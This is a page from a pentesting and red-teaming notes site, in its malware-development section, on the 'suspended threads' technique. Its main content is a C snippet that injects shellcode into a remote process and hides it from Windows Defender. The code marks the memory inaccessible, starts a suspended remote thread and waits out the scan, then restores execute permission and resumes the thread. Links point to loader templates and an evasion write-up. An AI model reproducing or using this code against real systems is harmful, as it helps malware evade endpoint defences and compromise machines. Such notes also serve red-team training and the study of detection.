🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  1. Malware Development

Suspended Threads

printf("[+] Changing memory protection, marking it as PAGE_NO_ACCESS\n");
//Mark memory as PAGE_NOACCESS (0x1)
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_NOACCESS, &protect); // out uint lpflOldProtect ?

// create suspended remote thread
//IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0x00000004, out hThread);

// CREATE_SUSPENDED = 0x00000004
printf("[+] Creating suspended remote thread\n");
hRemoteThread = myCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, CREATE_SUSPENDED, NULL);

//sleep 15 seconds while defender scans the memory
printf("[+] Sleeping for 15 seconds...\n");

//CronosSleep(15);
Sleep(15000);

// Mark memory as executable again; PAGE_EXECUTE_READWRITE (0x40)
printf("[+] Changing memory protection back, marking it as PAGE_EXECUTE_READWRITE\n");
myVirtualProtectEx(hProcess, pRemoteBuffer, SHELLCODE_MEMORY_SIZE, PAGE_EXECUTE_READWRITE, &protect);

printf("[+] Resuming remote thread\n");
myResumeThread(hRemoteThread);

PreviousDynamic API ResolutionNextPPID Spoofing

Last updated 2 years ago

https://www.bordergate.co.uk/windows-defender-memory-scanning-evasion/
https://github.com/morph3/myldr/blob/main/templates/msbuild_aes_encrypt_suspended_thread.csproj
https://github.com/morph3/myldr/blob/main/templates/suspended_thread.c